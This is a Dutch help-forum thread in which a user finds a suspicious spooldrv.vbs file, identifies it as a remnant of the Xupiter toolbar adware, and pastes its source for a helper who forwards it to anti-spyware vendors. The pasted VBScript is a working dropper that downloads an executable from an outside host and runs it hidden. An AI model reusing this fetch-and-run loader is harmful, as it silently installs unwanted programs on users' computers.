spooldrv vbs script file

[hendricus]

Het is misschien niks, maar ik vind onder c:\ een bestandje met de naam spooldrv van het type vbscript script file. Over spooldrv vindt Google slechts twee Tsjechische sites, dat maakt me een beetje wantrouwig (de afkorting vbs trouwens ook).
Wie weet wat dit bestandje is/ doet?

 

[hendricus]

Ik ben blijven zoeken naar de oplossing met het volgende resultaat: Door het omzetten van .vbs in kladblok kon ik zien wat spooldrv was.
Het betreft een rest van Xupiter Toolbarloader.exe , de naam zegt het al. In de Pac'sPortal startup list staat hij vermeld mét een verwijdertooltje!
Omdat het een restant is staat deze spooldrv waarschijnlijk niet in mijn hijackthis logfile, anders had ik 'm wel eerder gevonden.
Nou ja, vraag opgelost.

 

[Pieter Arntz]

hendricus,

Als dat bestandje niet gevonden werd door AdAware wil ik wel graag een kopietje.

Pieter

 

[hendricus]

Ik had 'm al in de prullenbak zitten. Bovendien je post gemist. Maar hier is ie:
Dim BinaryData
Dim xml
set xml = CreateObject("Microsoft.XMLHTTP")
xml.Open "GET", "http://mlandi.addr.com/XupiterToolbarLoader.exe", False
xml.Send
BinaryData = xml.ResponseBody
Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2
Dim BinaryStream
set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = adTypeBinary
BinaryStream.Open
BinaryStream.Write BinaryData
BinaryStream.SaveToFile "c:\wbdldr.exe", adSaveCreateOverWrite
Dim WshShell
set WshShell = CreateObject("WScript.Shell")
WshShell.Run "c:\wbdldr.exe", 0, false

 

[Pieter Arntz]

Tenk joe,

Pieter

 

[Pieter Arntz]

Hendricus,

Heb je dit bestandje ook?

c:\wbdldr.exe

Groetjes,

Pieter

 

[hendricus]

Nee!
Should I?

 

[Pieter Arntz]

Hoi Hendricus,

Dat vroeg ik me af vanwege dat laatste regeltje in de .vbs

Nodig heb je hem niet.

Groetjes,

Pieter

 

[hendricus]

Pieter,
Adaware had 'm niet gezien en ook door Hijackthis is ie niet gelezen. Komt dat omdat deze spooldrv niet compleet ( dus "in" die Xupiter toolbarloader) is binnengekomen in mijn systeem. Er waren per slot ook geen veranderingen aan m'n toolbar te zien.

 

[Pieter Arntz]

Hoi hendricus,

Die .vbs is nooit gestart. Anders zou je namelijk wel een bestandje c:\wbdldr.exe hebben gehad.

Ik heb ondertussen de .vbs en XupiterToolbarLoader.exe opgestuurd naar de makers van anti-spyware progjes, waaronder AdAware en Spybot S&D.

Voor Spybot S&D is het goed om te weten dat het alleen spyware vindt die werkzaam is (geweest) op je computer. Hetzelfde geldt voor AdAware als je een Smart system-scan doet.

Groetjes,

Pieter

 

[hendricus]

Okay, Pieter,
Smart system scan is hetzelfde als diepe register scan + register scan + scan actieve processen ?

 

[Pieter Arntz]

Smart system scan is Scan actieve processen + registerscans + cookies.
Als er in het register iets gevonden wordt aan spyware, wordt aan de hand daarvan ook naar de bijbehorende mappen en bestanden gezocht.

Groetjes,

Pieter